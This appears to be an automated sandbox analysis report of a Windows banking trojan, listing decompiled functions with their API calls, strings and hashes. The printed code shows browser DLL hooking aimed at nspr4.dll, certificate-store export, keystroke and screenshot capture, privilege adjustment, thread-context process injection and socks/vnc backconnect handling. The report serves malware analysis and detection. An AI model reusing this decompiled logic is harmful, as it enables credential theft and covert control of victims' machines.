0x00405e35
0x00405ddb
0x00405e3d
0x00000000
0x00405e3d

APIs

TranslateMessage.USER32(?), ref: 00405EB7

Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9

EnterCriticalSection.KERNEL32(004228A8), ref: 00405D9A
LeaveCriticalSection.KERNEL32(004228A8), ref: 00405E3D

Part of subcall function 00411779: LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 004117AB
Part of subcall function 00411779: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 004117BC
Part of subcall function 00411779: GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 004117C9
Part of subcall function 00411779: GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 004117D6
Part of subcall function 00411779: GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 004117E3
Part of subcall function 00411779: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 004117F0
Part of subcall function 00411779: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 004117FD
Part of subcall function 00411779: GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0041180A
Part of subcall function 00411779: LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 00411852
Part of subcall function 00411779: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041185D
Part of subcall function 00411779: LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0041186F
Part of subcall function 00411779: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041187A
Part of subcall function 00411779: GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 00411886
Part of subcall function 00411779: GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 00411893
Part of subcall function 00411779: GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 004118A0
Part of subcall function 00411779: GetProcAddress.KERNEL32(?,SelectObject), ref: 004118AD
Part of subcall function 00411779: GetProcAddress.KERNEL32(?,BitBlt), ref: 004118BA
Part of subcall function 00411779: GetProcAddress.KERNEL32(?,DeleteObject), ref: 004118C7

GetTickCount.KERNEL32 ref: 00405DFF
GetKeyboardState.USER32(?), ref: 00405E57
ToUnicode.USER32 ref: 00405E7F

Strings

, xrefs: 00405E9D

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
String ID:
API String ID: 2762424063-3916222277
Opcode ID: 6e81bc6ae7d7701d116d56c491785d57f76aca2d1d9e471e081d89ebc407246f
Instruction ID: d490220980ad6ed93fe595966bcf8ebf79417177323edd108bf136aeb4d3499b
Opcode Fuzzy Hash: 6e81bc6ae7d7701d116d56c491785d57f76aca2d1d9e471e081d89ebc407246f
Instruction Fuzzy Hash: A431BE32604701ABDB20EB64DD49A9B77A8EF04310F44483BF994F61E1DB78DA458BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00415E14, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00415E14(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
				void* __edi;
				void* _t12;
				long _t13;
				void* _t16;
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t23;
				UNICODE_STRING* _t24;
				void* _t28;
				HMODULE* _t29;
				struct _OBJDIR_INFORMATION _t31;

				if(E0040EEE1() != 0) {
					_t29 = _a16;
					_t24 = _a12;
					_t12 =  *0x422bcc(_a4, 0, _t24, _t29, _t23, _t28, _t17);
					_t13 = LdrLoadDll(_a4, _a8, _t24, _t29);
					_a4 = _t13;
					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
						EnterCriticalSection(0x4231ac);
						if(( *0x423144 & 0x00000001) == 0) {
							_t31 =  *_t29;
							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
								_t16 = 0;
							} else {
								_t16 = E004159B8(_t21, _t22, _t31);
							}
							if(_t16 != 0) {
								 *0x423144 =  *0x423144 | 0x00000001;
							}
						}
						LeaveCriticalSection(0x4231ac);
					}
					return _a4;
				}
				goto ( *0x422bc8);
			}

0x00415e1e
0x00415e29
0x00415e2d
0x00415e37
0x00415e47
0x00415e4d
0x00415e52
0x00415e6b
0x00415e78
0x00415e7d
0x00415e8d
0x00415e98
0x00415e8f
0x00415e91
0x00415e91
0x00415e9c
0x00415e9e
0x00415e9e
0x00415e9c
0x00415ea6
0x00415ea6
0x00415eb3
0x00415eb3
0x00415e21

APIs

Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 00415E37
LdrLoadDll.NTDLL(?,?,?,?), ref: 00415E47
EnterCriticalSection.KERNEL32(004231AC), ref: 00415E6B
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00415E85
LeaveCriticalSection.KERNEL32(004231AC), ref: 00415EA6

Strings

@xw, xrefs: 00415E21, 00415E47
nspr4.dll, xrefs: 00415E7F

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterHandleLeaveLoadObjectSingleWaitlstrcmpi
String ID: @xw$nspr4.dll
API String ID: 2984399785-1669710511
Opcode ID: 719a63a365665ee137ea2d677e3992c5865579bdddd7ec27bb5fb93580bd2e6f
Instruction ID: c701a48caa768924cfcababe9648c27c944c0d08995dc24eb32be2479b5a1681
Opcode Fuzzy Hash: 719a63a365665ee137ea2d677e3992c5865579bdddd7ec27bb5fb93580bd2e6f
Instruction Fuzzy Hash: FF115E31600714EBDF215F21ED44BEB7B68EF85755F04402AFD08A7261C779EAA1CAAC

Uniqueness

Uniqueness Score: -1.00%

Function 0041D5F1, Relevance: 12.1, APIs: 8, Instructions: 119encryptiontimeCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00404B84), ref: 0041D60C
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0041D628
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0041D634
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0041D673
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0041D6A3
CharLowerW.USER32(?,?,00000000,00000001), ref: 0041D6C1
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0041D6CC
CertCloseStore.CRYPT32(?,00000000), ref: 0041D755

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
String ID:
API String ID: 3751268071-0
Opcode ID: a9205bfa33ef882c3b560dd41546a9960b1fab9baf124496d2f64d7cfa1a5d46
Instruction ID: 62c3b1b4f8da8e5576372c0920d59ecb87bfd3b6922c567e92ebeb561ac8e865
Opcode Fuzzy Hash: a9205bfa33ef882c3b560dd41546a9960b1fab9baf124496d2f64d7cfa1a5d46
Instruction Fuzzy Hash: FF419AB1508345ABD7119F55CD40AAFBBECAB84714F00093FFA98E2191D634D985C766

Uniqueness

Uniqueness Score: -1.00%

Function 0041BAD3, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041BAD3(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				void* _v1128;
				int _t51;
				signed int _t60;
				long _t68;
				signed char _t71;
				signed int _t83;

				_v1120 = __edx;
				_v1124 = __ecx;
				_t51 = E0041BC2F("*",  &_v524, __ecx);
				if(_t51 == 0) {
					L25:
					return _t51;
				}
				_t51 = FindFirstFileW( &_v524,  &_v1116);
				_v1128 = _t51;
				if(_t51 != 0xffffffff) {
					_t71 = _a8;
					while(1) {
						_t83 = 0;
						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
							break;
						}
						if(E0041B834( &(_v1116.cFileName)) != 0) {
							L23:
							if(FindNextFileW(_v1128,  &_v1116) != 0) {
								continue;
							}
							break;
						}
						_t60 = _v1116.dwFileAttributes & 0x00000010;
						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
								goto L17;
							} else {
								goto L10;
							}
						} else {
							L10:
							if(_a4 <= _t83) {
								L17:
								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E0041BC2F( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
									_t103 = _a24;
									if(_a24 != 0) {
										Sleep(_a24);
									}
									E0041BAD3( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
								}
								goto L23;
							}
							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
								_t83 = _t83 + 1;
								if(_t83 < _a4) {
									continue;
								}
								goto L17;
							}
							_t68 = _a12(_a16);
							__eflags = _t68;
							if(_t68 == 0) {
								break;
							}
							__eflags = _a28;
							if(_a28 != 0) {
								Sleep(_a28);
							}
							goto L17;
						}
					}
					_t51 = FindClose(_v1128);
				}
			}

0x0041baf0
0x0041baf4
0x0041baf8
0x0041baff
0x0041bc26
0x0041bc2c
0x0041bc2c
0x0041bb12
0x0041bb18
0x0041bb1f
0x0041bb25
0x0041bb2e
0x0041bb2e
0x0041bb33
0x00000000
0x00000000
0x0041bb55
0x0041bc05
0x0041bc16
0x00000000
0x00000000
0x00000000
0x0041bc16
0x0041bb5f
0x0041bb62
0x0041bb6b
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bb72
0x0041bb72
0x0041bb75
0x0041bbb2
0x0041bbb7
0x0041bbd7
0x0041bbdb
0x0041bbe0
0x0041bbe0
0x0041bc00
0x0041bc00
0x00000000
0x0041bbb7
0x0041bb77
0x0041bb8d
0x0041bb91
0x00000000
0x00000000
0x00000000
0x0041bb93
0x0041bba0
0x0041bba3
0x0041bba5
0x00000000
0x00000000
0x0041bba7
0x0041bbab
0x0041bbb0
0x0041bbb0
0x00000000
0x0041bbab
0x0041bb62
0x0041bc20
0x0041bc20

APIs

Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB12
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BB39
PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BB83
Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 0041BBB0
Sleep.KERNEL32(00000000,?,?), ref: 0041BBE0
FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC0E
FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BC20

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID:
API String ID: 2348139788-0
Opcode ID: df86d6d66e581e59a2c0f1926b8253b7cbd4eb2174fce9e08a484130d2ae7d0c
Instruction ID: b80c358cf10a3b6234cd0841c56f7429f1e6e3f092ebd59e69b9d4d14f4816b3
Opcode Fuzzy Hash: df86d6d66e581e59a2c0f1926b8253b7cbd4eb2174fce9e08a484130d2ae7d0c
Instruction Fuzzy Hash: C4415E3100820A9BCF21DF14CD48AEF7BA5FF44344F10492AF995926A1E739D9D9CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00417A74, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417A74(WCHAR* _a4) {
				void* _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t23;

				_t23 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
						_t23 = 1;
					}
					CloseHandle(_v12);
					return _t23;
				} else {
					return 0;
				}
			}

0x00417a7f
0x00417a93
0x00417ab2
0x00417aba
0x00417ac9
0x00417aea
0x00417aea
0x00417aef
0x00000000
0x00417aa7
0x00000000
0x00417aa7

APIs

GetCurrentThread.KERNEL32 ref: 00417A84
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00408F58,SeTcbPrivilege), ref: 00417A8B
OpenProcessToken.ADVAPI32(000000FF,00000020,00408F58,?,?,?,?,00408F58,SeTcbPrivilege), ref: 00417A9D
LookupPrivilegeValueW.ADVAPI32(00000000,00408F58,?), ref: 00417AC1
AdjustTokenPrivileges.ADVAPI32(00408F58,00000000,00000001,00000000,00000000,00000000), ref: 00417AD6
GetLastError.KERNEL32 ref: 00417AE0
CloseHandle.KERNEL32(00408F58), ref: 00417AEF

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
String ID:
API String ID: 2724707430-0
Opcode ID: a6c8dbe12b51af1182475902ce92d802dfcf34907721043a860339e9293bd7b0
Instruction ID: 356259359bbfac2e2ecbcc8256f049f907c66e15c834a8f5fd79b38554ae7f18
Opcode Fuzzy Hash: a6c8dbe12b51af1182475902ce92d802dfcf34907721043a860339e9293bd7b0
Instruction Fuzzy Hash: 8F010C71604208BFEF009FA19D89EEF7BBCEF04384F004166F501E21A0E7748A858A69

Uniqueness

Uniqueness Score: -1.00%

Function 00415CE5, Relevance: 9.1, APIs: 6, Instructions: 85
threadnativeinjectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00415CE5(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed char _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				struct _CONTEXT _v776;
				void* _v780;
				intOrPtr _v784;
				void* __edi;
				void* __esi;
				long _t32;
				intOrPtr _t36;
				void* _t37;
				void* _t45;
				void** _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				void** _t53;
				void* _t54;
				void* _t56;
				signed int _t58;
				void* _t70;

				_t49 = __edx;
				_t46 = _a4;
				_t32 =  *0x422bbc(_t46, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t50, _t54, _t45);
				_v776.ContextFlags = _t32;
				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t46 != 0 && _a8 != 0 && E0040EEE1() != 0 && GetProcessId( *_t46) != 0) {
					_t36 = E0040ED0F(_t48, _t49, _t35);
					_v784 = _t36;
					_t68 = _t36;
					if(_t36 != 0) {
						_t37 = E0040EDF6(_t48,  *_t46, _t54, _t68, _t36, 0);
						_t53 = _a8;
						_t56 = _t37;
						_v780 = _t56;
						_t58 = _t56 -  *0x422bac + E0040F574;
						_v776.ContextFlags = 0x10003;
						if(GetThreadContext( *_t53,  &_v776) == 0) {
							L12:
							VirtualFreeEx( *_t46, _v776.Dr0, 0, 0x8000);
						} else {
							_t70 = _v776.EFlags -  *0x422bc4; // 0x77e5ba60
							if(_t70 != 0) {
								goto L12;
							} else {
								if(( *0x422b98 & 0x00000010) != 0) {
									_t58 = _t58 ^ _v776.Eip;
								}
								_v776.Eip = _t58;
								_v776.Dr1.ContextFlags = 0x10002;
								if(SetThreadContext( *_t53,  &(_v776.Dr1)) == 0) {
									goto L12;
								}
							}
						}
						CloseHandle(_v780);
					}
				}
				return _v776.ContextFlags;
			}

0x00415ce5
0x00415cf7
0x00415d16
0x00415d1c
0x00415d22
0x00415d62
0x00415d67
0x00415d6b
0x00415d6d
0x00415d78
0x00415d7d
0x00415d80
0x00415d86
0x00415d93
0x00415d99
0x00415da9
0x00415dea
0x00415df7
0x00415dab
0x00415db2
0x00415db8
0x00000000
0x00415dba
0x00415dc1
0x00415dc3
0x00415dc3
0x00415dd1
0x00415dd8
0x00415de8
0x00000000
0x00000000
0x00415de8
0x00415db8
0x00415e01
0x00415e01
0x00415d6d
0x00415e11

APIs

NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00415D16

Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9

GetProcessId.KERNEL32(?), ref: 00415D53

Part of subcall function 0040ED0F: CreateMutexW.KERNEL32(00422BD0,00000001,?,00422E10,74B5F560,?,00000002,?,74B5F560), ref: 0040ED57
Part of subcall function 0040ED0F: GetLastError.KERNEL32 ref: 0040ED63
Part of subcall function 0040ED0F: CloseHandle.KERNEL32(00000000), ref: 0040ED71

GetThreadContext.KERNEL32 ref: 00415DA1
SetThreadContext.KERNEL32(00000000,00000000), ref: 00415DE0
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 00415DF7
CloseHandle.KERNEL32(?), ref: 00415E01

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseContextCreateHandleProcessThread$ErrorFreeLastMutexObjectSingleUserVirtualWait
String ID:
API String ID: 1044471028-0
Opcode ID: 18ce88f1e46a8753f04d367e3a07ffd249dddddf39a2bac27017ce3db60d49e8
Instruction ID: 182a28668fdaf9cec88f6625dcde32d198843b3673ed66d45ef1297c3adb834d
Opcode Fuzzy Hash: 18ce88f1e46a8753f04d367e3a07ffd249dddddf39a2bac27017ce3db60d49e8
Instruction Fuzzy Hash: C7319C31600306EBCB218F50DD08BDB7BA9FF88354F04852AFD44A22A0C775D9A4DF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041764D, Relevance: 9.1, APIs: 6, Instructions: 53encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(0041BC76,00000000,00000000,00000001,F0000040,00000000,0041BC76,?,00000030,?,?,?,0041C18F,?), ref: 00417666
CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,0041C18F,?), ref: 0041767E
CryptHashData.ADVAPI32(?,00000010), ref: 0041769A
CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 004176B2
CryptDestroyHash.ADVAPI32(?), ref: 004176C9
CryptReleaseContext.ADVAPI32(?,00000000,?,?,0041C18F,?), ref: 004176D3

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
String ID:
API String ID: 3186506766-0
Opcode ID: 3835dfc47da88fbb4b0aff3b662bcb981bcd3fbea2fbc8bd214e1f0a9aaea509
Instruction ID: 376e00ff1d7d2ae177ae3805b162e4706f3c2ae8251cb659aee294adaf4f7081
Opcode Fuzzy Hash: 3835dfc47da88fbb4b0aff3b662bcb981bcd3fbea2fbc8bd214e1f0a9aaea509
Instruction Fuzzy Hash: 35111275804248BFEF129BA4DD88EEE7F3DEB04350F008462F551B01B1C2369E949B28

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB94, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040DB94(void* __ecx, CHAR** _a4, signed int _a7) {
				signed int _v6;
				signed int _v8;
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				short _v30;
				intOrPtr _v36;
				char _v44;
				char _v304;
				char _v788;
				char _v792;
				void* __edi;
				void* __esi;
				int _t68;
				signed short _t70;
				signed int _t80;
				void* _t95;
				signed int _t99;
				void* _t102;
				signed int _t108;
				void* _t112;
				CHAR** _t121;
				signed int _t130;
				intOrPtr* _t131;
				intOrPtr* _t138;
				signed int _t139;
				void* _t141;

				_t123 = __ecx;
				E0041645B( &_v304,  &_v304, 0, 0x104);
				_t121 = _a4;
				if(lstrcmpiA( *_t121, ?str?) != 0) {
					_t68 = lstrcmpiA( *_t121, "vnc");
					__eflags = _t68;
					if(_t68 != 0) {
						_t70 = E00416A27( *_t121, _t123, 0);
						_t6 = _t70 - 1; // -1
						_t123 = _t6;
						__eflags = _t6 - 0xfffd;
						if(_t6 > 0xfffd) {
							L32:
							E0041A4A9( &_v304);
							_a7 = 0;
							if(_v304 <= 0) {
								L34:
								E004163A8( *_t121);
								E004163A8(_t121[1]);
								E004163A8(_t121[2]);
								E00419B7B(_t121[3]);
								E004163A8(_t121);
								return 0;
							} else {
								goto L33;
							}
							do {
								L33:
								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
								_a7 = _a7 + 1;
							} while (_a7 < _v304);
							goto L34;
						}
						_t80 = _t70 & 0x0000ffff;
						_v24 = _t80;
						__eflags = _t80;
						if(_t80 == 0) {
							goto L32;
						}
						L6:
						_t130 = E00419431(E00416A27(_t121[2], _t123, 0), _t123, _t121[1]);
						_v16 = _t130;
						if(_t130 == 0xffffffff) {
							goto L32;
						}
						E004197A3(_t123, _t130);
						E00419761(_t130);
						_t89 = E004171FF(E0040F087(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
						_t144 = _t89;
						if(_t89 == 0) {
							L31:
							E0041974B(_t89, _t130);
							goto L32;
						}
						_v9 = E0041CA42( &_v788, _v36, _t144, _t130, 1, _v44);
						_t89 = E004171ED( &_v44);
						if(_v9 == 0) {
							goto L31;
						}
						_t89 = E00419658(0,  &_v16, 0, 0);
						_t130 = _v16;
						if(_t89 != _t130) {
							goto L31;
						}
						while(1) {
							_push(0x7530);
							_push( &_v8);
							_t95 = 4;
							if(E0041935B(_t95, _t130) == 0 || _v8 <= 4) {
								break;
							}
							_t138 = E00416378(_v8 & 0x0000ffff);
							_push(0x7530);
							if(_t138 == 0) {
								_t127 = _v8 & 0x0000ffff;
								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
								L29:
								_push(_t99);
								_push(_t130);
								_t89 = E004193A3(_t127);
								break;
							}
							_push(_t138);
							_t127 = _t130;
							_t102 = E0041935B((_v8 & 0x0000ffff) - 4, _t130);
							_push(_t138);
							if(_t102 == 0) {
								L35:
								_t89 = E004163A8();
								break;
							}
							_v30 = _v6;
							_v28 =  *_t138;
							E004163A8();
							if(_v6 != 0) {
								_t139 = E00416378(_v6 & 0x0000ffff);
								_t99 = _v6 & 0x0000ffff;
								_push(0x7530);
								__eflags = _t139;
								if(_t139 == 0) {
									goto L29;
								}
								_push(_t139);
								_t127 = _t130;
								_t108 = E0041935B(_t99, _t130);
								__eflags = _t108;
								if(_t108 == 0) {
									_push(_t139);
									goto L35;
								}
								_v20 = _t139;
								L20:
								if(_v28 == 2 && _v30 == 4) {
									_t112 = 0xc;
									_t131 = E00416378(_t112);
									if(_t131 != 0) {
										 *_t131 = _a4;
										 *((intOrPtr*)(_t131 + 4)) = _v24;
										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
										if(E0041A464( &_v304, 0x20000, E0040D90B, _t131) == 0) {
											E004163A8(_t131);
										}
									}
									E0041A412(_t127,  &_v304);
								}
								E004163A8(_v20);
								_t89 = E00419658(0,  &_v16, 0, 0);
								_t130 = _v16;
								if(_t89 == _t130) {
									continue;
								} else {
									break;
								}
							}
							_v20 = _v20 & 0x00000000;
							goto L20;
						}
						_t121 = _a4;
						goto L31;
					}
					_v24 = 0xfffffffe;
					goto L6;
				}
				_v24 = _v24 | 0xffffffff;
				goto L6;
			}

0x0040db94
0x0040dbae
0x0040dbb3
0x0040dbc7
0x0040dbd6
0x0040dbd8
0x0040dbda
0x0040dbe9
0x0040dbee
0x0040dbee
0x0040dbf1
0x0040dbf7
0x0040ddd0
0x0040ddd6
0x0040dde2
0x0040dde6
0x0040de07
0x0040de09
0x0040de11
0x0040de19
0x0040de21
0x0040de27
0x0040de32
0x00000000
0x00000000
0x00000000
0x0040dde8
0x0040dde8
0x0040ddf3
0x0040ddf9
0x0040ddff
0x00000000
0x0040dde8
0x0040dbfd
0x0040dc00
0x0040dc03
0x0040dc05
0x00000000
0x00000000
0x0040dc0b
0x0040dc1d
0x0040dc1f
0x0040dc25
0x00000000
0x00000000
0x0040dc2c
0x0040dc32
0x0040dc4f
0x0040dc54
0x0040dc56
0x0040ddc9
0x0040ddcb
0x00000000
0x0040ddcb
0x0040dc6d
0x0040dc70
0x0040dc79
0x00000000
0x00000000
0x0040dc89
0x0040dc8e
0x0040dc93
0x00000000
0x00000000
0x0040dc9e
0x0040dc9e
0x0040dca2
0x0040dca5
0x0040dcaf
0x00000000
0x00000000
0x0040dcc9
0x0040dccb
0x0040dcce
0x0040ddb7
0x0040ddbb
0x0040ddbf
0x0040ddbf
0x0040ddc0
0x0040ddc1
0x00000000
0x0040ddc1
0x0040dcdb
0x0040dcdc
0x0040dcde
0x0040dce3
0x0040dce6
0x0040de35
0x0040de35
0x00000000
0x0040de35
0x0040dcf0
0x0040dcf6
0x0040dcf9
0x0040dd03
0x0040dd14
0x0040dd16
0x0040dd1a
0x0040dd1b
0x0040dd1d
0x00000000
0x00000000
0x0040dd23
0x0040dd24
0x0040dd26
0x0040dd2b
0x0040dd2d
0x0040de3c
0x00000000
0x0040de3c
0x0040dd33
0x0040dd36
0x0040dd3a
0x0040dd45
0x0040dd4b
0x0040dd4f
0x0040dd54
0x0040dd59
0x0040dd72
0x0040dd7c
0x0040dd7f
0x0040dd7f
0x0040dd7c
0x0040dd8a
0x0040dd8a
0x0040dd92
0x0040dda1
0x0040dda6
0x0040ddab
0x00000000
0x0040ddb1
0x00000000
0x0040ddb1
0x0040ddab
0x0040dd05
0x00000000
0x0040dd05
0x0040ddc6
0x00000000
0x0040ddc6
0x0040dbdc
0x00000000
0x0040dbdc
0x0040dbc9
0x00000000

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 0040DBC3
lstrcmpiA.KERNEL32(?,vnc), ref: 0040DBD6
CloseHandle.KERNEL32(?), ref: 0040DDF3

Part of subcall function 0041A464: SetLastError.KERNEL32(0000009B,0040F382,00000000,0040FA7D,00000000,00422A90,00000000,00000104,74B5F560,00000000), ref: 0041A46E

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

Strings

vnc, xrefs: 0040DBCF
socks, xrefs: 0040DBBC

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
String ID: socks$vnc
API String ID: 3305036421-270151703
Opcode ID: 75b8e4c2b2d7933f3109896334b3120045d80d9b6f01cb261bd7d8df81ac878c
Instruction ID: fb4c9373c4ca911734dbe7eb4aa62743471319ea5aaa63728d05c18a29072b1b
